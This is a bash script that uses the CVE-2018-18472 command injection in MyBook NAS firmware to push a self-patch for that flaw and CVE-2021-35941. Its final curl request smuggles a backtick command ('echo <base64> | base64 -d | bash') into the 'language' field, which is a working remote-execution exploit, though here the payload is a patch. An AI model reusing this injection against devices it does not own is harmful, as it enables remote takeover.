#!/bin/bash

IP=192.168.69.62

# This script will use CVE-2018-18472 to inject following shell-script to your MyBook NAS, which fixes CVE-2018-18472 and CVE-2021-35941
# The script can be executed from any computer
# (* Payload works, but INJECTION NOT TESTED YET *)
#
#	#!/bin/bash
#	TMPFILE="/tmp/cve"
#
#	CVE="CVE-2018-18472"
#	CURFILE="/var/www/Admin/webapp/includes/languageConfiguration.php"
#	OLDFILE="/var/www/Admin/webapp/includes/languageConfiguration.old"
#	if [ -f "$CURFILE" ]; then
#		if [ ! -f "$OLDFILE" ]; then
#			cp -rp "$CURFILE" "$OLDFILE"
#		fi
#		cat "$CURFILE" | grep "Fixed $CVE" > /dev/null
#		if [ $? -ne 0 ]; then
#			cat "$CURFILE" | sed 's@exec("sudo bash -c '"'"'(echo \\"language {\$changes@if (!preg_match('"'"'/^[a-z]{2}_[A-Z]{2}$/'"'"', $changes["language"], $dummy)) return '"'"'BAD_REQUEST'"'"'; // Fixed CVE-2018-18472\n\t\texec("sudo bash -c '"'"'(echo \\"language {\$changes@gi' | sed 's@exec("sudo bash -c '"'"'(echo \\"language {\$lang@if (!preg_match('"'"'/^[a-z]{2}_[A-Z]{2}$/'"'"', $lang["language"], $dummy)) return '"'"'BAD_REQUEST'"'"'; // Fixed CVE-2018-18472\n\t\texec("sudo bash -c '"'"'(echo \\"language {\$lang@gi' > "$TMPFILE"
#			if [ $? -eq 0 ]; then
#				php -l "$TMPFILE" > /dev/null
#				if [ $? -eq 0 ]; then
#					cat "$TMPFILE" > "$CURFILE"
#				fi
#			fi
#			rm -f "$TMPFILE"
#		fi
#	fi
#
#	CVE="CVE-2021-35941"
#	CURFILE="/var/www/Admin/webapp/includes/component_config.php"
#	OLDFILE="/var/www/Admin/webapp/includes/component_config.old"
#	if [ -f "$CURFILE" ]; then
#		if [ ! -f "$OLDFILE" ]; then
#			cp -rp "$CURFILE" "$OLDFILE"
#		fi
#		cat "$CURFILE" | grep "Fixed $CVE" > /dev/null
#		if [ $? -ne 0 ]; then
#			cat "$CURFILE" | sed "s@'System_factory_restore'),@'System_factory_restore', \$ADMIN_AUTH_LAN_ALL), // Fixed CVE-2021-35941@g" > "$TMPFILE"
#			if [ $? -eq 0 ]; then
#				php -l "$TMPFILE" > /dev/null
#				if [ $? -eq 0 ]; then
#					cat "$TMPFILE" > "$CURFILE"
#				fi
#			fi
#			rm -f "$TMPFILE"
#		fi
#	fi

curl -v -X PUT --header 'Content-Type: application/json' --header 'Accept: application/json' -d 'submit=p%24EFx3tQWoUbFc%25B%25R%24k%40&language=%60cat+%2Fetc%2Flanguage.conf+%7C+cut+-d+%22+%22+-f+2%60%60echo+%22IyEvYmluL2Jhc2gKVE1QRklMRT0iL3RtcC9jdmUiCgpDVkU9IkNWRS0yMDE4LTE4NDcyIgpDVVJGSUxFPSIvdmFyL3d3dy9BZG1pbi93ZWJhcHAvaW5jbHVkZXMvbGFuZ3VhZ2VDb25maWd1cmF0aW9uLnBocCIKT0xERklMRT0iL3Zhci93d3cvQWRtaW4vd2ViYXBwL2luY2x1ZGVzL2xhbmd1YWdlQ29uZmlndXJhdGlvbi5vbGQiCmlmIFsgLWYgIiRDVVJGSUxFIiBdOyB0aGVuCglpZiBbICEgLWYgIiRPTERGSUxFIiBdOyB0aGVuCgkJY3AgLXJwICIkQ1VSRklMRSIgIiRPTERGSUxFIgoJZmkKCWNhdCAiJENVUkZJTEUiIHwgZ3JlcCAiRml4ZWQgJENWRSIgPiAvZGV2L251bGwKCWlmIFsgJD8gLW5lIDAgXTsgdGhlbgoJCWNhdCAiJENVUkZJTEUiIHwgc2VkICdzQGV4ZWMoInN1ZG8gYmFzaCAtYyAnIiciJyhlY2hvIFxcImxhbmd1YWdlIHtcJGNoYW5nZXNAaWYgKCFwcmVnX21hdGNoKCciJyInL15bYS16XXsyfV9bQS1aXXsyfSQvJyInIicsICRjaGFuZ2VzWyJsYW5ndWFnZSJdLCAkZHVtbXkpKSByZXR1cm4gJyInIidCQURfUkVRVUVTVCciJyInOyAvLyBGaXhlZCBDVkUtMjAxOC0xODQ3MlxuXHRcdGV4ZWMoInN1ZG8gYmFzaCAtYyAnIiciJyhlY2hvIFxcImxhbmd1YWdlIHtcJGNoYW5nZXNAZ2knIHwgc2VkICdzQGV4ZWMoInN1ZG8gYmFzaCAtYyAnIiciJyhlY2hvIFxcImxhbmd1YWdlIHtcJGxhbmdAaWYgKCFwcmVnX21hdGNoKCciJyInL15bYS16XXsyfV9bQS1aXXsyfSQvJyInIicsICRsYW5nWyJsYW5ndWFnZSJdLCAkZHVtbXkpKSByZXR1cm4gJyInIidCQURfUkVRVUVTVCciJyInOyAvLyBGaXhlZCBDVkUtMjAxOC0xODQ3MlxuXHRcdGV4ZWMoInN1ZG8gYmFzaCAtYyAnIiciJyhlY2hvIFxcImxhbmd1YWdlIHtcJGxhbmdAZ2knID4gIiRUTVBGSUxFIgoJCWlmIFsgJD8gLWVxIDAgXTsgdGhlbgoJCQlwaHAgLWwgIiRUTVBGSUxFIiA%2BIC9kZXYvbnVsbAoJCQlpZiBbICQ%2FIC1lcSAwIF07IHRoZW4KCQkJCWNhdCAiJFRNUEZJTEUiID4gIiRDVVJGSUxFIgoJCQlmaQoJCWZpCgkJcm0gLWYgIiRUTVBGSUxFIgoJZmkKZmkKCkNWRT0iQ1ZFLTIwMjEtMzU5NDEiCkNVUkZJTEU9Ii92YXIvd3d3L0FkbWluL3dlYmFwcC9pbmNsdWRlcy9jb21wb25lbnRfY29uZmlnLnBocCIKT0xERklMRT0iL3Zhci93d3cvQWRtaW4vd2ViYXBwL2luY2x1ZGVzL2NvbXBvbmVudF9jb25maWcub2xkIgppZiBbIC1mICIkQ1VSRklMRSIgXTsgdGhlbgoJaWYgWyAhIC1mICIkT0xERklMRSIgXTsgdGhlbgoJCWNwIC1ycCAiJENVUkZJTEUiICIkT0xERklMRSIKCWZpCgljYXQgIiRDVVJGSUxFIiB8IGdyZXAgIkZpeGVkICRDVkUiID4gL2Rldi9udWxsCglpZiBbICQ%2FIC1uZSAwIF07IHRoZW4KCQljYXQgIiRDVVJGSUxFIiB8IHNlZCAic0AnU3lzdGVtX2ZhY3RvcnlfcmVzdG9yZScpLEAnU3lzdGVtX2ZhY3RvcnlfcmVzdG9yZScsIFwkQURNSU5fQVVUSF9MQU5fQUxMKSwgLy8gRml4ZWQgQ1ZFLTIwMjEtMzU5NDFAZyIgPiAiJFRNUEZJTEUiCgkJaWYgWyAkPyAtZXEgMCBdOyB0aGVuCgkJCXBocCAtbCAiJFRNUEZJTEUiID4gL2Rldi9udWxsCgkJCWlmIFsgJD8gLWVxIDAgXTsgdGhlbgoJCQkJY2F0ICIkVE1QRklMRSIgPiAiJENVUkZJTEUiCgkJCWZpCgkJZmkKCQlybSAtZiAiJFRNUEZJTEUiCglmaQpmaQo%3D%22+%7C+base64+-d+%7C+bash+%3E+%2Fdev%2Fnull%60' "http://$IP/api/1.0/rest/language_configuration/"